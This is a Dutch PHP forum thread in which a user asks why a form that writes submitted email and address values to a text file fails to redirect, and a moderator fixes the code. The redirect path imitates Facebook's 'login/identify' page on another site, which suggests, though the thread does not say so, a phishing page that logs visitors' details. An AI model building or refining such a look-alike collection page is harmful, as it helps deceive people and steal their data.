php file contents probleem

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Pagina: « vorige 1 2

Pascal klienstra

pascal klienstra

17/07/2019 01:01:51
Quote Anchor link
Het is me gelukt alleen nu wil ik als ik op de submit knop drukt dat die naar page2.php leidt
nou heb ik als volgende
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

<?php
if( isset( $_POST['submit'] ) )
{
  
echo '<meta http-equiv="Refresh" content="0; url=/page2.php" />';
}

else
{

    //Het ophalen en het schrijven van het bestand
    $file  = 'test.txt';
    $text  = $_POST['email'] . "\n";
    $text .= $_POST['adres'] . "\n";
    $fhandler = fopen($file, "a");
    fwrite($fhandler, $text);
    fclose($fhandler);  
}

?>


alleen de gegevens slaat die niet op
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3

echo '<meta http-equiv="Refresh" content="0; url=/www.facebook.com/login/identify/page2.php" />';
}

als ik deze weg haal werkt die wel weer iemand enige idee ?
Gewijzigd op 17/07/2019 01:06:24 door pascal klienstra
 
PHP hulp

PHP hulp

19/04/2024 21:05:26
 
- Ariën  -
Beheerder

- Ariën -

17/07/2019 01:26:10
Quote Anchor link
Logisch, want je stuurt alleen door. De POST wordt niet meegenomen.


Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
if($_SERVER['REQUEST_METHOD']=="POST") { // betere controle of het formulier ge-POST is.

    //Het ophalen en het schrijven van het bestand

    $file  = 'test.txt';
    $text  = $_POST['email'] . "\n";
    $text .= $_POST['adres'] . "\n";
    $fhandler = fopen($file, "a");
    fwrite($fhandler, $text);
    fclose($fhandler);
 
    // Doorsturen
    header('Location:https://www.jouwsite.nl/www.facebook.com/login/identify/page2.php');
    exit; // script afbreken na doorsturen. Doorgaan is onnodig.
}
?>
 
Pascal klienstra

pascal klienstra

17/07/2019 01:43:12
Quote Anchor link
als ik dat doe krijg ik de page2.php niet te zien
enkel wat mijn div veranderd naar niks
Gewijzigd op 17/07/2019 01:43:29 door pascal klienstra
 
- Ariën  -
Beheerder

- Ariën -

17/07/2019 08:17:22
Quote Anchor link
Heb je de foutafhandeling wel aanstaan? Heb je de URL al aangepast?
Ik vermoed dat de redirect niet werkt vanwege output voor de header.
Gewijzigd op 17/07/2019 08:37:24 door - Ariën -
 
Pascal klienstra

pascal klienstra

17/07/2019 17:25:41
Quote Anchor link
klopt krijgt ook enkel de header te zien
 
- Ariën  -
Beheerder

- Ariën -

17/07/2019 17:44:45
Quote Anchor link
headers worden uitgevoerd, die zie je niet. of je ziet een foutmelding.
Wat zie je precies?
 
Pascal klienstra

pascal klienstra

17/07/2019 17:58:21
Quote Anchor link
nou ik zie dus niks enkel mijn header terwijl ik op page2.php een andere pagina heb hij blijft op index.php staan
 
- Ariën  -
Beheerder

- Ariën -

17/07/2019 18:20:13
Quote Anchor link
Ik benadruk nog even mijn vorige post. Want je bent nog niet echt duidelijk!
 

Pagina: « vorige 1 2



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.